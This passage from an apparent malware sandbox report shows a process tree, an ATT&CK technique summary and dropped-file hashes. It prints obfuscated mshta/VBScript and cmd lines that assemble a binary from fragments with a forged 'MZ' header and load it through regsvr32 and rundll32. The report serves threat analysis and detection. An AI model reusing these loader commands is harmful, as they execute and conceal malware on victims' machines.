                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4536
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4640
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5092
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5096
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4352
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                      PID:1884
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                      regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3880
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                  taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                                                                                                                              Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:804
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                PID:5940
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                  PID:6480
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                PID:5496
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6796
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5580
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    PID:6212
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                      PID:6428
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                    PID:7816
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    PID:3556
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    PID:8852
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 66CFA87401EC01CF7B46DBB7AE8F3832 C
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8952
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 831EE8DBDF39220C87D57237BF3ABA72
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                        PID:8680
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                          PID:3620
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 1D57E598F2988E2B1877D07F92203E50 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1304
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                        PID:8648
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3328
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                          PID:6204
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5548
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                            PID:3880
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                            PID:1644
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                              PID:6384
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:7288
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                            PID:2576
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:6424
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                            PID:1932
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7492
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                              PID:5700
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5836
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                PID:5580
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7972
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                    PID:7976
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                    PID:372
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                    PID:9124

                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                                                                                                                  Change Default File Association

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1042

                                                                                                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                  BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1197

                                                                                                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                  BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1197

                                                                                                                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                                                                                                                  Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1518

                                                                                                                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                                                                                                                  Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1063

                                                                                                                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                    c0898ed9531b296ceafde170f7668f9a

                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                    ac702d4b856602cbf9c6a916310a379d761b2d15

                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                    e88f14304eced742f7838f39919f2e237b20846f342f7b21303e0496e882eee4

                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                    bb8447ba13e9888531845a17ea10450ea589bca7c744237cf4da90d694e38640d68b191d2e21137b53962f711ff5d06ab2cc922f9c8841c3073a38c96c378f62

                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                    bcb1f4325fc6f66e06d27bc0b680940b

                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                    d426b19ab01b43dc173eefe4db1fe6d7304a6f5b

                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                    6d1fbff085cc6e783b306932a047463455deaca5c62757f50ee2babad6768952

                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                    488e36e25cea1f0a946edc787259d3e3bf66953d579a24e56efe02020dd8765d99a6f1e1b7727bede3aa9e80696fe068bb57efc333cef41528edc7743f953464

                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                    bcb1f4325fc6f66e06d27bc0b680940b

                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                    d426b19ab01b43dc173eefe4db1fe6d7304a6f5b

                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                    6d1fbff085cc6e783b306932a047463455deaca5c62757f50ee2babad6768952

